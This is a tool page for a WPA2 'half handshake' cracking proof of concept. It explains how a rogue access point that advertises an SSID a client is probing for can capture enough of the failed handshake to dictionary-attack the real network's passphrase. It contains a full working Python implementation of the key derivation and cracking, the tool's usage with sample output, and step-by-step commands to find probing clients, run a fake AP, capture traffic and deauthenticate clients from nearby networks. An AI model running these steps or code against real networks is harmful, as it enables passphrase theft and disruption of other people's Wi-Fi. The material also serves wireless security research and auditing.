

WPA2-HalfHandshake-Crack Description

This is a proof of concept (POC) showing that enough of a WPA2 handshake can be captured between a client and a fake AP to run a dictionary attack on the real network's passphrase, without the real AP being present and without knowing its passphrase.

Conventional WPA2 attacks work by listening for the handshake between a client and its access point. The full four-way handshake is then used in a dictionary attack. This tool is a proof of concept showing that the access point does not need to be present. An attacker can simply listen for WPA2 probe requests from any client within range and then bring up an access point with the probed SSID. The authentication fails, because the fake AP does not know the passphrase, but by then the client has already sent the second handshake message: its SNonce and a MIC computed with a key derived from the real passphrase, the SSID, both MAC addresses and both nonces. Together with the ANonce the fake AP itself chose in message 1, that is enough information to run a dictionary attack against the failed handshake.
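As an added example (not the project's own code and not taken from this page), the following Python reproduces the mechanism described above end to end. The fake AP sends message 1 with an ANonce of its choosing; the client derives the PTK from the real passphrase, the SSID it probed for, both MAC addresses and both nonces, and answers with message 2 carrying its SNonce and a MIC. The code simulates that client reply and then recovers the passphrase from messages 1 and 2 alone by testing dictionary candidates. The SSID, MAC addresses, nonces and wordlist are constructed for the example; the EAPOL-Key layout, PBKDF2 and PRF details follow IEEE 802.11 for WPA2-PSK with AES-CCMP (key descriptor version 2).

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional

# Constructed sample values for this example (not from a real capture).
SSID = b"no place like"                      # SSID the client probed for; the fake AP advertises it
AP_MAC = bytes.fromhex("48d224f0d128")       # fake AP address, as in the usage example
CLIENT_MAC = bytes.fromhex("001122334455")   # hypothetical client address

EAPOL_NONCE = slice(17, 49)   # Key Nonce field inside an EAPOL-Key frame
EAPOL_MIC = slice(81, 97)     # Key MIC field


def pmk_from_passphrase(passphrase: bytes, ssid: bytes) -> bytes:
    """WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1, 4096 rounds, 256 bits, SSID as salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 128 bits of the PTK (the Key Confirmation Key) via the 802.11 PRF.

    Besides the PMK, only the two MACs and the two nonces enter the derivation,
    and the fake AP supplies one of the nonces itself, so messages 1 and 2 suffice.
    """
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:16]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (AES-CCMP): HMAC-SHA1 over the EAPOL frame with the
    MIC field zeroed, truncated to 16 bytes."""
    zeroed = frame[:EAPOL_MIC.start] + b"\x00" * 16 + frame[EAPOL_MIC.stop:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def client_message2(passphrase: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """What a real client sends after receiving message 1 from the fake AP.

    The client only knows the real network's passphrase, so the MIC it computes
    is keyed by the real PMK even though the AP in front of it is fake.
    """
    kck = derive_kck(pmk_from_passphrase(passphrase, SSID), AP_MAC, CLIENT_MAC, anonce, snonce)
    key_info = 0x010A  # descriptor version 2 (CCMP), pairwise key, MIC present
    body = (struct.pack("!BHHQ", 2, key_info, 0, 1)   # descriptor type, key info, key length, replay counter
            + snonce                                  # Key Nonce = SNonce
            + b"\x00" * (16 + 8 + 8)                  # Key IV, Key RSC, Key ID (unused in message 2)
            + b"\x00" * 16                            # MIC placeholder, filled in below
            + struct.pack("!H", 0))                   # empty key data (a real client puts its RSN IE here)
    frame = struct.pack("!BBH", 1, 3, len(body)) + body   # EAPOL header: version 1, type 3 = EAPOL-Key
    mic = eapol_mic(kck, frame)
    return frame[:EAPOL_MIC.start] + mic + frame[EAPOL_MIC.stop:]


def crack_half_handshake(anonce: bytes, msg2: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack using only the fake AP's ANonce and the client's message 2."""
    snonce = msg2[EAPOL_NONCE]
    captured_mic = msg2[EAPOL_MIC]
    for word in wordlist:
        pmk = pmk_from_passphrase(word.encode(), SSID)
        kck = derive_kck(pmk, AP_MAC, CLIENT_MAC, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return word
    return None


def demo(real_passphrase: str = "interwebs",
         wordlist: Iterable[str] = ("password", "letmein", "interwebs", "hunter2")) -> Optional[str]:
    """Simulate the exchange: fake AP picks the ANonce, client answers, attacker cracks."""
    anonce = hashlib.sha256(b"fake-ap-nonce").digest()   # attacker-chosen, so always known
    snonce = hashlib.sha256(b"client-nonce").digest()    # read from the client's reply
    msg2 = client_message2(real_passphrase.encode(), anonce, snonce)
    return crack_half_handshake(anonce, msg2, wordlist)


if __name__ == "__main__":
    print("Passphrase found!", demo())
```

Note what the attacker never needs: messages 3 and 4 do not occur, because the fake AP cannot produce a valid MIC, yet the MIC in message 2 is already keyed by the real PMK. The tool on this page reads the same fields out of a pcap; here they are built in memory so the example runs offline. Two caveats a practitioner should keep in mind: the SSID is the PBKDF2 salt, so the fake AP must advertise exactly the probed SSID or every candidate will fail, and TKIP networks (key descriptor version 1) compute the MIC with HMAC-MD5 rather than HMAC-SHA1.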


Author: Dylan Ayrey

License: MIT

WPA2-HalfHandshake-Crack Help

Mandatory arguments:
-r 	Where to read the input pcap file with the half handshake (works with full handshakes too)
-m 	AP MAC address (of the 'fake' access point that was used during the capture)
-s 	SSID of the 'fake' access point that was used during the capture (see the usage example)

Optional arguments:
-d 	Where to read the dictionary from

WPA2-HalfHandshake-Crack Usage Example

To crack the half handshake in sampleHalfHandshake.cap (-r), captured by a fake AP with MAC address 48d224f0d128 (-m) and SSID "no place like" (-s), run the tool's script, halfHandshake.py:

python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like"


loading dictionary...
0.00788388022717% done. 250.469172638 hashes per second
0.0143003228938% done. 237.207726195 hashes per second
0.0212346846995% done. 238.343685782 hashes per second
0.0286869656441% done. 243.284719499 hashes per second
0.0353048213093% done. 240.624328943 hashes per second
0.0408005188399% done. 232.44365987 hashes per second
0.0468141355095% done. 229.104042665 hashes per second
0.0534895377457% done. 229.456259021 hashes per second
0.0597908872703% done. 228.302626008 hashes per second
0.0664375162209% done. 228.54339761 hashes per second
0.0731129184571% done. 228.830520246 hashes per second
0.0798170939787% done. 229.162336484 hashes per second
0.0865212695004% done. 229.442956452 hashes per second
Passphrase found! interwebs

Capturing half handshakes

To listen for device probes, the aircrack-ng suite can be used as follows:

sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon

You should begin to see probe requests from clients whose BSSID is shown as (not associated) at the bottom of the output. If WPA2 SSIDs show up as the probed networks for these clients, those clients can be targeted.

Set up a WPA2 Wi-Fi network with an SSID identical to the one the target client is probing for. The passphrase can be anything: the client's reply is keyed by the real network's passphrase, and the attack only needs that failed attempt.

Capture traffic on the interface hosting this network. On Linux this can be done with tcpdump:

sudo tcpdump -i wlan0 -s 65535 -w file.cap

(Optional) Deauthenticate clients from nearby Wi-Fi networks to increase the number of probes.

If there are not enough unassociated clients, the aircrack-ng suite (aireplay-ng) can be used to deauthenticate clients from nearby networks; once disconnected, they probe again for the networks they know.

How to install WPA2-HalfHandshake-Crack

Installation on Kali Linux

git clone
cd WPA2-HalfHandshake-Crack/
sudo python setup.py install
